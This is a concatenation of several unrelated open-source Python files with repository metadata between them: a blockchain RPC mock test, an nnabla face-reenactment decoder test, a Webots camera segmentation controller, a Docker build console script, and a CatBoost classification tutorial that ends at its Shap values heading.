"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
},
"id": 1
}
elif method == 'chain_getBlock':
# Correct
if params[0] == '0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93':
return {
"jsonrpc": "2.0",
"result": {
"block": {
"extrinsics": ['0x280403000b695f47ff8601'],
"header": {
"digest": {'logs': [{'preRuntime': ['0x6e6d6273', '0x6a3f02ac48ee3080aa304fe6c336d6c75b302e08041a5c1d6a9a30541f51b618']}, {'preRuntime': ['0x72616e64', '0xe468581da52a51330797c9f5762d98a241f28b3bde9017307e15cfc9a6ebb6741e7da1282681401b26752a04073ea98335005699817e546db343b457fcc7150cdf9edabb3a7b8e35acd6e763235c9ce415bdb0a22d98024cb6410beeb74d3903']}, {'consensus': ['0x66726f6e', '0x019ad160fc5080a49795f34607dadc267a0a0485dc0e6fa46c0ded42ac102a92813090c50b4ff02aed1ca173df1f8915d9872e47a6c3c71a0a32d36d342d6c00ab9f50a496f171bad265ab5a3512568e1234cdab03f7ee1a98ce6e489d5726deed3c125f5c342d0662ccfcea93d2c34c35f328b183af68502ea9e2a72e83522dd7f884ac7a067b4e5cfae4766fd0b2159809cbe3d1af7eb1747c1a3e675982bd9312b90c5020048fef1349759f22b20a919af96ae7270dd40614eb7345ce35beff07980cb675de6be9bafd8fd2e2322cd2fce6f24d0a23c8a68adcced46da0be3b280ead3a25348bb9e6f7a90aac0a2d8a3d8badcb94c3929a5fd898146ecfd361b39de60b7a194a6e4751aa8b54c435a7a9a6af274700b870528ff0780f6ca63ba7449d5534fb786e33900b30966970f29db6310244860409dd6af96a09f9b82946d3f47a61c3bfb21a43e257b3ddf56d07ce8bfdbcb2c277eca96ebe95a8042ec0faf5d65a20505c1562aba4bde857552766320c61fd748c260a0c334a4bfec1ffedbb288cc8bd3348e4c48bd67118ce3936e3fc67b90aeebab97dbda0f6cfeb7e']}, {'seal': ['0x6e6d6273', '0x561e0be2c6f495f326fbc1bf67943f5ff087133d42860fb1dbe8f260deb4570110e1aab58f6f4064ec1839b351987489bf027e274ae593b52c88d99ae6b92f8e']}]},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": "0x67",
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
}
},
"justification": None
},
"id": 1
}
# Raises decoding errors
elif params[0] == '0x40b98c29466fa76eeee21008b50d5cb5d7220712ead554eb97a5fd6ba4bc31b5':
return {
"jsonrpc": "2.0",
"result": {
"block": {
"extrinsics": [
"0x240402000b9405724377",
"0x280402100b940572437701",
"0x280402000b940572437701",
"0x280402000c940572437701",
],
"header": {
"digest": {
"logs": [
"0x066175726120afe0021000000000",
"0x05617572610101567be3d55b4885ce3ac6a7b46b28adf138299acc3eb5f11ffa15c3ed0551f22b7220ec676ea947cd6c8daa6fcfa351b11e62651e6e06f5dde59bb566d36e6989"
]
},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": "0x67",
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
}
},
"justification": None
},
"id": 1
}
elif method == 'state_getStorageAt':
return {'jsonrpc': '2.0', 'result': '0x04be5ddb1579b72e84524fc29e78609e3caf42e85aa118ebfe0b0ad404b5bdd25f', 'id': 11}
elif method == 'chain_subscribeNewHeads':
return result_handler({
"jsonrpc": "2.0",
"params": {
"result": {
"digest": {
"logs": ['0x066175726120afe0021000000000', '0x05617572610101567be3d55b4885ce3ac6a7b46b28adf138299acc3eb5f11ffa15c3ed0551f22b7220ec676ea947cd6c8daa6fcfa351b11e62651e6e06f5dde59bb566d36e6989']
},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": "0x67",
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
},
"subscription": 'test1'
}
}, 0, 'test1')
elif method == 'chain_unsubscribeNewHeads':
return {
"jsonrpc": "2.0",
"result": True
}
elif method == 'rpc_methods':
return {
"jsonrpc": "2.0",
"result": {"methods": ['author_submitExtrinsic', 'author_submitAndWatchExtrinsic', 'author_unwatchExtrinsic', 'author_pendingExtrinsics', 'chain_getBlockHash', 'chain_getHeader', 'chain_getBlock', 'chain_getFinalizedHead', 'chain_subscribeNewHead', 'chain_subscribeFinalizedHeads', 'chain_unsubscribeNewHead', 'chain_subscribeNewHeads', 'chain_unsubscribeNewHeads', 'chain_unsubscribeFinalizedHeads', 'state_getRuntimeVersion', 'state_getMetadata', 'state_getStorage', 'state_getKeysPaged', 'state_queryStorageAt', 'state_call', 'state_subscribeRuntimeVersion', 'state_unsubscribeRuntimeVersion', 'state_subscribeStorage', 'state_unsubscribeStorage', 'system_localPeerId', 'system_nodeRoles', 'system_localListenAddresses', 'system_chain', 'system_properties', 'system_name', 'system_version', 'system_chainType', 'system_health', 'system_dryRun', 'system_accountNextIndex', 'payment_queryFeeDetails', 'payment_queryInfo', 'dev_newBlock', 'dev_setStorage', 'dev_timeTravel', 'dev_setHead', 'dev_dryRun', 'rpc_methods']},
"id": 1
}
raise ValueError(f"Unsupported mocked method {method}")
cls.substrate.rpc_request = MagicMock(side_effect=mocked_request)
cls.substrate.query = MagicMock(side_effect=mocked_query)
def test_get_block_by_head(self):
block = self.substrate.get_block()
self.assertEqual('0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93', block['header']['hash'])
def test_get_chain_head(self):
block_hash = self.substrate.get_chain_head()
self.assertEqual('0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93', block_hash)
if __name__ == '__main__':
unittest.main()
|
927d6b64b830bf18d51b3a195305e1bf7ad7b4b3
|
d6aae799e18e907fb413b715200c7832252a87e5
|
/facial-motion-transfer/reenactgan/test_decoder.py
|
ceb44bab90a5835d8f5cf8bc3bf09fa787daa8b4
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0",
"CC-BY-NC-4.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
sony/nnabla-examples
|
0d0bbd5df3028996e790bcf07248fdb0932697d1
|
41f71faa6efff7774a76bbd5af3198322a90a6ab
|
refs/heads/master
| 2023-09-04T03:45:54.023899
| 2023-08-22T03:31:21
| 2023-08-22T03:31:21
| 109,625,584
| 308
| 108
|
Apache-2.0
| 2023-08-22T03:31:23
| 2017-11-05T23:30:40
|
Python
|
UTF-8
|
Python
| false
| false
| 4,593
|
py
|
test_decoder.py
|
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import glob
import argparse
import nnabla as nn
import nnabla.logger as logger
import nnabla.monitor as nm
import data
import models
from utils import combine_images
from config import load_decoder_config
def test(config, netG, train_iterator, monitor, param_file):
# Load image and boundary image to get Variable shapes
img, bod_map, bod_map_resize = train_iterator.next()
real_img = nn.Variable(img.shape)
real_bod_map = nn.Variable(bod_map.shape)
real_bod_map_resize = nn.Variable(bod_map_resize.shape)
################### Graph Construction ####################
# Generator
with nn.parameter_scope('netG_decoder'):
fake_img = netG(real_bod_map, test=False)
fake_img.persistent = True
# load parameters of networks
with nn.parameter_scope('netG_decoder'):
nn.load_parameters(param_file)
monitor_vis = nm.MonitorImage(
'result', monitor, interval=config["test"]["vis_interval"], num_images=4, normalize_method=lambda x: x)
# Test
i = 0
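    # Round up so one pass covers the whole dataset even when its size is not
    # a multiple of the batch size.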
iter_per_epoch = train_iterator.size // config["test"]["batch_size"] + 1
if config["num_test"]:
num_test = config["num_test"]
else:
num_test = train_iterator.size
for _ in range(iter_per_epoch):
img, bod_map, bod_map_resize = train_iterator.next()
real_img.d = img
real_bod_map.d = bod_map
real_bod_map_resize.d = bod_map_resize
# Generate fake image
fake_img.forward(clear_buffer=True)
i += 1
images_to_visualize = [real_bod_map_resize.d, fake_img.d, img]
visuals = combine_images(images_to_visualize)
monitor_vis.add(i, visuals)
if i > num_test:
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument('config', default=None, type=str)
parser.add_argument('--param-file', default=None, type=str)
parser.add_argument('--num-test', '-n', default=None, type=int)
args = parser.parse_args()
param_file = args.param_file
config = load_decoder_config(args.config)
config["num_test"] = args.num_test
#########################
# Context Setting
# Get context.
from nnabla.ext_utils import get_extension_context
logger.info(f'Running in {config["context"]}.')
ctx = get_extension_context(
config["context"], device_id=config["device_id"])
nn.set_default_context(ctx)
#########################
# Data Loading
    logger.info('Initializing Datasource')
train_iterator = data.celebv_data_iterator(dataset_mode="decoder",
celeb_name=config["trg_celeb_name"],
data_dir=config["train_dir"],
ref_dir=config["ref_dir"],
mode="test",
batch_size=config["test"]["batch_size"],
shuffle=False,
with_memory_cache=config["test"]["with_memory_cache"],
with_file_cache=config["test"]["with_file_cache"],
)
monitor = nm.Monitor(os.path.join(
config["test"]["logdir"], "decoder", config["trg_celeb_name"], config["experiment_name"]))
# Network
netG = models.netG_decoder
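    # Fall back to the most recently modified netG_* checkpoint when no
    # parameter file is given explicitly.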
if not param_file:
param_file = sorted(glob.glob(os.path.join(
config["logdir"],
"decoder",
config["trg_celeb_name"],
config["experiment_name"],
"netG_*")), key=os.path.getmtime)[-1]
test(config, netG, train_iterator, monitor, param_file)
if __name__ == '__main__':
main()
|
47165dbf6d7f25b249aa557268ce036ff0cdc0b4
|
e8b04bef9aa1ac8e2c109dd315f133c8f4d28ae6
|
/projects/samples/devices/controllers/camera_segmentation/camera_segmentation.py
|
b3b4530e47bbd7b4566917f369c30c87036505ae
|
[
"Apache-2.0"
] |
permissive
|
cyberbotics/webots
|
f075dacf4067e8dcebbfd89e8690df8525f6d745
|
8aba6eaae76989facf3442305c8089d3cc366bcf
|
refs/heads/master
| 2023-08-31T09:41:13.205940
| 2023-08-18T10:48:30
| 2023-08-18T10:48:30
| 156,228,018
| 2,495
| 1,525
|
Apache-2.0
| 2023-08-28T16:30:33
| 2018-11-05T14:09:10
|
C++
|
UTF-8
|
Python
| false
| false
| 2,091
|
py
|
camera_segmentation.py
|
# Copyright 1996-2023 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An example of using a camera device with recognition capability.
"""
from controller import Robot, Display
class Controller(Robot):
def __init__(self):
super(Controller, self).__init__()
self.timeStep = 64
self.camera = self.getDevice('camera')
self.camera.enable(self.timeStep)
self.camera.recognitionEnable(self.timeStep)
self.camera.enableRecognitionSegmentation()
self.display = self.getDevice('segmented image display')
self.left_motor = self.getDevice('left wheel motor')
self.right_motor = self.getDevice('right wheel motor')
self.left_motor.setPosition(float('inf'))
self.right_motor.setPosition(float('inf'))
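        # Opposite wheel velocities make the robot spin in place so the
        # camera sweeps the whole scene.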
self.left_motor.setVelocity(-1.5)
self.right_motor.setVelocity(1.5)
def run(self):
width = self.camera.getWidth()
height = self.camera.getHeight()
while self.step(self.timeStep) != -1:
if self.camera.isRecognitionSegmentationEnabled() and self.camera.getRecognitionSamplingPeriod() > 0:
# Get the segmented image and display it in the Display
data = self.camera.getRecognitionSegmentationImage()
if data:
segmented_image = self.display.imageNew(data, Display.BGRA, width, height)
self.display.imagePaste(segmented_image, 0, 0, False)
self.display.imageDelete(segmented_image)
controller = Controller()
controller.run()
|
3d3ddab2b13aeff1a4794e68149c6ccdd1aec1c4
|
c3ddaf355e551b04a7ba9882497320d49c2cb461
|
/bin/console
|
0ec2645a0fe29c6833280f6f035838e00a934990
|
[
"MIT"
] |
permissive
|
webdevops/Dockerfile
|
f64dd04803279f20eb9881d9088117fd38df9909
|
e902a5dac2bc382905468b5db8481e43a7ecfcfb
|
refs/heads/master
| 2023-05-25T23:36:24.053754
| 2023-05-16T14:02:38
| 2023-05-16T14:02:38
| 44,695,081
| 1,630
| 599
|
MIT
| 2023-05-16T14:02:40
| 2015-10-21T18:09:48
|
Shell
|
UTF-8
|
Python
| false
| false
| 4,004
|
console
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys
# prevent bytecode
sys.dont_write_bytecode = True
# unbuffered stdout / stderr
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
sys.stderr = os.fdopen(sys.stderr.fileno(), 'w', 0)
import re, yaml
from cleo import Application
from webdevops import Configuration
from webdevops.docker.DockerBaseClient import DockerBaseClient
from webdevops.docker.DockerPyClient import DockerPyClient
from webdevops.docker.DockerCliClient import DockerCliClient
from command.docker_build_command import DockerBuildCommand
from command.docker_push_command import DockerPushCommand
from command.docker_pull_command import DockerPullCommand
from command.docker_exec_command import DockerExecCommand
from command.test_testinfra_command import TestTestinfraCommand
from command.test_serverspec_command import TestServerspecCommand
from command.generate_dockerfile_command import GenerateDockerfileCommand
from command.generate_graph_command import GenerateGraphCommand
from command.generate_provision_command import GenerateProvisionCommand
if __name__ == '__main__':
# Generate common paths
script_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.dirname(script_path)
conf_path = os.path.join(root_path, 'conf')
def generatePath(path):
"""
Generate full path based on root path
"""
        return os.path.abspath(os.path.join(root_path, path))
# Read console.yml for configuration
with open(os.path.join(conf_path, 'console.yml'), 'r') as stream:
try:
configuration = yaml.load(stream)
configuration['confPath'] = conf_path
except yaml.YAMLError as e:
configuration = None
print ' !!! Exception while loading configuration from %s:' % conf_path
print ''
print e
print ''
sys.exit(1)
# Check if configuration is valid
if configuration is None:
print ' !!! Configuration not found'
sys.exit(1)
# generate full paths
path_entries = [
'dockerPath',
'templatePath',
'provisionPath',
'imagePath',
'baselayoutPath',
'testinfraPath',
'serverspecPath',
'blacklistFile',
]
for key in path_entries:
if key in configuration:
configuration[key] = generatePath(configuration[key])
# Translate regexp
if 'docker' in configuration:
if 'pathRegex' in configuration['docker']:
configuration['docker']['pathRegex'] = re.compile(configuration['docker']['pathRegex'])
        if 'autoPullBlacklist' in configuration['docker']:
            configuration['docker']['autoPullBlacklist'] = re.compile(configuration['docker']['autoPullBlacklist'])
if 'dockerTest' in configuration:
if 'configuration' in configuration['dockerTest']:
if 'imageConfigurationRegex' in configuration['dockerTest']['configuration']:
configuration['dockerTest']['configuration']['imageConfigurationRegex'] = re.compile(configuration['dockerTest']['configuration']['imageConfigurationRegex'])
configuration = Configuration.merge(configuration)
configuration = Configuration.dotdictify(configuration)
# Init application
application = Application()
application.add(DockerBuildCommand(configuration=configuration))
application.add(DockerPushCommand(configuration=configuration))
application.add(DockerPullCommand(configuration=configuration))
application.add(DockerExecCommand(configuration=configuration))
application.add(TestTestinfraCommand(configuration=configuration))
application.add(TestServerspecCommand(configuration=configuration))
application.add(GenerateDockerfileCommand(configuration=configuration))
application.add(GenerateGraphCommand(configuration=configuration))
application.add(GenerateProvisionCommand(configuration=configuration))
application.run()
|
|
a1d0400f668a7a80af32f74c2fad6321c48e1860
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/catboost/pytest/smoke_tests/classification_tutorial_cpu.py
|
0d140f566cbfbf95ba251cba74e2afe449b4a1fc
|
[
"Apache-2.0"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 18,866
|
py
|
classification_tutorial_cpu.py
|
import os
try:
import catboost_dev as catboost
from catboost_dev import *
from catboost_dev import datasets
from catboost_dev.utils import create_cd
from catboost_dev import CatBoostClassifier
from catboost_dev.widget import MetricVisualizer
from catboost_dev import cv
from catboost_dev.utils import get_roc_curve
from catboost_dev.utils import get_fpr_curve
from catboost_dev.utils import get_fnr_curve
from catboost_dev.utils import select_threshold
from catboost_dev import CatBoost
from catboost_dev.eval.catboost_evaluation import *
from catboost_dev.eval.evaluation_result import *
except ImportError:
import catboost
from catboost import *
from catboost import datasets
from catboost.utils import create_cd
from catboost import CatBoostClassifier
from catboost.widget import MetricVisualizer
from catboost import cv
from catboost.utils import get_roc_curve
from catboost.utils import get_fpr_curve
from catboost.utils import get_fnr_curve
from catboost.utils import select_threshold
from catboost import CatBoost
from catboost.eval.catboost_evaluation import *
from catboost.eval.evaluation_result import *
## Solving classification problems with CatBoost
#[](https://colab.research.google.com/github/catboost/tutorials/blob/master/classification/classification_tutorial.ipynb)
#
#In this tutorial we will use dataset Amazon Employee Access Challenge from [Kaggle](https://www.kaggle.com) competition for our experiments. Data can be downloaded [here](https://www.kaggle.com/c/amazon-employee-access-challenge/data).
### Libraries installation
#!pip install --user --upgrade catboost
#!pip install --user --upgrade ipywidgets
#!pip install shap
#!pip install sklearn
#!pip install --upgrade numpy
#!jupyter nbextension enable --py widgetsnbextension
print(catboost.__version__)
os.system("python --version")
### Reading the data
import pandas as pd
import os
import numpy as np
np.set_printoptions(precision=4)
(train_df, test_df) = catboost.datasets.amazon()
train_df.head()
### Preparing your data
#Label values extraction
y = train_df.ACTION
X = train_df.drop('ACTION', axis=1)
#Categorical features declaration
cat_features = list(range(0, X.shape[1]))
print(cat_features)
#Looking at the label balance in the dataset
print('Labels: {}'.format(set(y)))
print('Zero count = {}, One count = {}'.format(len(y) - sum(y), sum(y)))
#Ways to create Pool class
dataset_dir = './amazon'
if not os.path.exists(dataset_dir):
os.makedirs(dataset_dir)
# We will be able to work with files with/without header and
# with different separators.
train_df.to_csv(
os.path.join(dataset_dir, 'train.tsv'),
index=False, sep='\t', header=False
)
test_df.to_csv(
os.path.join(dataset_dir, 'test.tsv'),
index=False, sep='\t', header=False
)
train_df.to_csv(
os.path.join(dataset_dir, 'train.csv'),
index=False, sep=',', header=True
)
test_df.to_csv(
os.path.join(dataset_dir, 'test.csv'),
index=False, sep=',', header=True
)
os.system("head amazon/train.csv")
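# Column 0 is the label (ACTION); map the remaining column indices to their
# names for the column description (cd) file.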
feature_names = dict()
for column, name in enumerate(train_df):
if column == 0:
continue
feature_names[column] = name
create_cd(
label=0,
cat_features=list(range(1, train_df.columns.shape[0])),
feature_names=feature_names,
output_path=os.path.join(dataset_dir, 'train.cd')
)
os.system("cat amazon/train.cd")
pool1 = Pool(data=X, label=y, cat_features=cat_features)
pool2 = Pool(
data=os.path.join(dataset_dir, 'train.csv'),
delimiter=',',
column_description=os.path.join(dataset_dir, 'train.cd'),
has_header=True
)
pool3 = Pool(data=X, cat_features=cat_features)
# The fastest way to create a Pool is from a numpy matrix.
# Use this approach when you need fast predictions
# or the fastest way to load the data in Python.
X_prepared = X.values.astype(str).astype(object)
# For FeaturesData class categorical features must have type str
pool4 = Pool(
data=FeaturesData(
cat_feature_data=X_prepared,
cat_feature_names=list(X)
),
label=y.values
)
print('Dataset shape')
print('dataset 1:' + str(pool1.shape) +
'\ndataset 2:' + str(pool2.shape) +
'\ndataset 3:' + str(pool3.shape) +
'\ndataset 4: ' + str(pool4.shape))
print('\n')
print('Column names')
print('dataset 1:')
print(pool1.get_feature_names())
print('\ndataset 2:')
print(pool2.get_feature_names())
print('\ndataset 3:')
print(pool3.get_feature_names())
print('\ndataset 4:')
print(pool4.get_feature_names())
### Split your data into train and validation
from sklearn.model_selection import train_test_split
X_train, X_validation, y_train, y_validation = train_test_split(X, y, train_size=0.8, random_state=1234)
### Selecting the objective function
#Possible options for binary classification:
#
#`Logloss`
#
#`CrossEntropy` for probabilities in target
model = CatBoostClassifier(
iterations=5,
learning_rate=0.1,
# loss_function='CrossEntropy'
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False
)
print('Model is fitted: ' + str(model.is_fitted()))
print('Model params:')
print(model.get_params())
### Stdout of the training
model = CatBoostClassifier(
iterations=15,
# verbose=5,
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
)
### Metrics calculation and graph plotting
model = CatBoostClassifier(
iterations=50,
random_seed=63,
learning_rate=0.5,
custom_loss=['AUC', 'Accuracy']
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
### Model comparison
model1 = CatBoostClassifier(
learning_rate=0.7,
iterations=100,
random_seed=0,
    train_dir='learning_rate_0.7'
)
model2 = CatBoostClassifier(
learning_rate=0.01,
iterations=100,
random_seed=0,
    train_dir='learning_rate_0.01'
)
model1.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=False
)
model2.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=False
)
MetricVisualizer(['learning_rate_0.01', 'learning_rate_0.7']).start()
### Best iteration
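# With an eval set, use_best_model is enabled by default, so the final model
# is shrunk to the iteration with the best validation score; the commented-out
# use_best_model=False below would keep all trees instead.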
model = CatBoostClassifier(
iterations=100,
random_seed=63,
learning_rate=0.5,
# use_best_model=False
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
print('Tree count: ' + str(model.tree_count_))
### Cross-validation
params = {}
params['loss_function'] = 'Logloss'
params['iterations'] = 80
params['custom_loss'] = 'AUC'
params['random_seed'] = 63
params['learning_rate'] = 0.5
cv_data = cv(
params = params,
pool = Pool(X, label=y, cat_features=cat_features),
fold_count=5,
shuffle=True,
partition_random_seed=0,
plot=True,
stratified=False,
verbose=False
)
cv_data.head()
best_value = np.min(cv_data['test-Logloss-mean'])
best_iter = np.argmin(cv_data['test-Logloss-mean'])
print('Best validation Logloss score, not stratified: {:.4f}+-{:.4f} on step {}'.format(
best_value,
cv_data['test-Logloss-std'][best_iter],
best_iter)
)
cv_data = cv(
params = params,
pool = Pool(X, label=y, cat_features=cat_features),
fold_count=5,
type = 'Classical',
shuffle=True,
partition_random_seed=0,
plot=True,
stratified=True,
verbose=False
)
best_value = np.min(cv_data['test-Logloss-mean'])
best_iter = np.argmin(cv_data['test-Logloss-mean'])
print('Best validation Logloss score, stratified: {:.4f}+-{:.4f} on step {}'.format(
best_value,
cv_data['test-Logloss-std'][best_iter],
best_iter)
)
### Overfitting detector
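# Training stops once the eval metric has not improved for
# early_stopping_rounds consecutive iterations.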
model_with_early_stop = CatBoostClassifier(
iterations=200,
random_seed=63,
learning_rate=0.5,
early_stopping_rounds=20
)
model_with_early_stop.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
print(model_with_early_stop.tree_count_)
model_with_early_stop = CatBoostClassifier(
eval_metric='AUC',
iterations=200,
random_seed=63,
learning_rate=0.5,
early_stopping_rounds=20
)
model_with_early_stop.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
print(model_with_early_stop.tree_count_)
### Select decision boundary
model = CatBoostClassifier(
random_seed=63,
iterations=200,
learning_rate=0.03,
)
model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=False,
plot=True
)
#
import sklearn
from sklearn import metrics
eval_pool = Pool(X_validation, y_validation, cat_features=cat_features)
curve = get_roc_curve(model, eval_pool)
(fpr, tpr, thresholds) = curve
roc_auc = sklearn.metrics.auc(fpr, tpr)
import matplotlib.pyplot as plt
plt.figure(figsize=(16, 8))
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc, alpha=0.5)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--', alpha=0.5)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.grid(True)
plt.xlabel('False Positive Rate', fontsize=16)
plt.ylabel('True Positive Rate', fontsize=16)
plt.title('Receiver operating characteristic', fontsize=20)
plt.legend(loc="lower right", fontsize=16)
plt.show(block=False)
(thresholds, fpr) = get_fpr_curve(curve=curve)
(thresholds, fnr) = get_fnr_curve(curve=curve)
plt.figure(figsize=(16, 8))
lw = 2
plt.plot(thresholds, fpr, color='blue', lw=lw, label='FPR', alpha=0.5)
plt.plot(thresholds, fnr, color='green', lw=lw, label='FNR', alpha=0.5)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.grid(True)
plt.xlabel('Threshold', fontsize=16)
plt.ylabel('Error Rate', fontsize=16)
plt.title('FPR-FNR curves', fontsize=20)
plt.legend(loc="lower left", fontsize=16)
plt.show(block=False)
print(select_threshold(model=model, data=eval_pool, FNR=0.01))
print(select_threshold(model=model, data=eval_pool, FPR=0.01))
### Snapshotting
# !rm 'catboost_info/snapshot.bkp'
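# save_snapshot periodically writes the training state to snapshot.bkp
# (every snapshot_interval seconds), so an interrupted run can resume.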
model = CatBoostClassifier(
iterations=100,
save_snapshot=True,
snapshot_file='snapshot.bkp',
snapshot_interval=1,
random_seed=43
)
model.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=True
)
### Model predictions
print(model.predict_proba(X=X_validation))
print(model.predict(data=X_validation))
raw_pred = model.predict(
data=X_validation,
prediction_type='RawFormulaVal'
)
print(raw_pred)
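# For a Logloss model, applying the sigmoid to the raw formula values
# reproduces the class-1 probabilities returned by predict_proba.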
from numpy import exp
sigmoid = lambda x: 1 / (1 + exp(-x))
probabilities = sigmoid(raw_pred)
print(probabilities)
X_prepared = X_validation.values.astype(str).astype(object)
# For FeaturesData class categorical features must have type str
fast_predictions = model.predict_proba(
X=FeaturesData(
cat_feature_data=X_prepared,
cat_feature_names=list(X_validation)
)
)
print(fast_predictions)
### Staged prediction
predictions_gen = model.staged_predict_proba(
data=X_validation,
ntree_start=0,
ntree_end=5,
eval_period=1
)
try:
for iteration, predictions in enumerate(predictions_gen):
print('Iteration ' + str(iteration) + ', predictions:')
print(predictions)
except Exception:
pass
### Solving MultiClassification problem
model = CatBoostClassifier(
iterations=50,
random_seed=43,
loss_function='MultiClass'
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
#For multiclass problems with many classes it is sometimes better to solve the classification problem using ranking.
#To do that we will build a dataset with groups.
#Every group will represent one object from our initial dataset.
#But it will have one additional categorical feature - possible class value.
#Target values will be equal to 1 if the class value is equal to the correct class, and 0 otherwise.
#Thus each group will have exactly one 1 in labels, and some zeros.
#You can put all possible class values in the group or you can try setting only hard negatives if there are too many labels.
#We'll show this approach on an example of binary classification problem.
from copy import deepcopy
def build_multiclass_ranking_dataset(X, y, cat_features, label_values=[0,1], start_group_id=0):
ranking_matrix = []
ranking_labels = []
group_ids = []
X_train_matrix = X.values
y_train_vector = y.values
for obj_idx in range(X.shape[0]):
obj = list(X_train_matrix[obj_idx])
for label in label_values:
obj_of_given_class = deepcopy(obj)
obj_of_given_class.append(label)
ranking_matrix.append(obj_of_given_class)
ranking_labels.append(float(y_train_vector[obj_idx] == label))
group_ids.append(start_group_id + obj_idx)
final_cat_features = deepcopy(cat_features)
final_cat_features.append(X.shape[1]) # new feature that we are adding should be categorical.
return Pool(ranking_matrix, ranking_labels, cat_features=final_cat_features, group_id = group_ids)
params = {'iterations':150, 'learning_rate':0.01, 'l2_leaf_reg':30, 'random_seed':0, 'loss_function':'QuerySoftMax'}
groupwise_train_pool = build_multiclass_ranking_dataset(X_train, y_train, cat_features, [0,1])
groupwise_eval_pool = build_multiclass_ranking_dataset(X_validation, y_validation, cat_features, [0,1], X_train.shape[0])
model = CatBoost(params)
model.fit(
X=groupwise_train_pool,
verbose=False,
eval_set=groupwise_eval_pool,
plot=True
)
#Doing predictions with ranking mode
import math
obj = list(X_validation.values[0])
ratings = []
for label in [0,1]:
obj_with_label = deepcopy(obj)
obj_with_label.append(label)
rating = model.predict([obj_with_label])[0]
ratings.append(rating)
print('Raw values:', np.array(ratings))
def soft_max(values):
return [math.exp(val) / sum([math.exp(val) for val in values]) for val in values]
print('Probabilities', np.array(soft_max(ratings)))
### Metric evaluation on a new dataset
model = CatBoostClassifier(
random_seed=63,
iterations=200,
learning_rate=0.03,
)
model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=50
)
metrics = model.eval_metrics(
data=pool1,
metrics=['Logloss','AUC'],
ntree_start=0,
ntree_end=0,
eval_period=1,
plot=True
)
print('AUC values:')
print(np.array(metrics['AUC']))
#
### Feature importances
model.get_feature_importance(prettified=True)
### Shap values
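# The ShapValues matrix has one extra final column holding the expected
# (base) value of the model, which is stripped off below.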
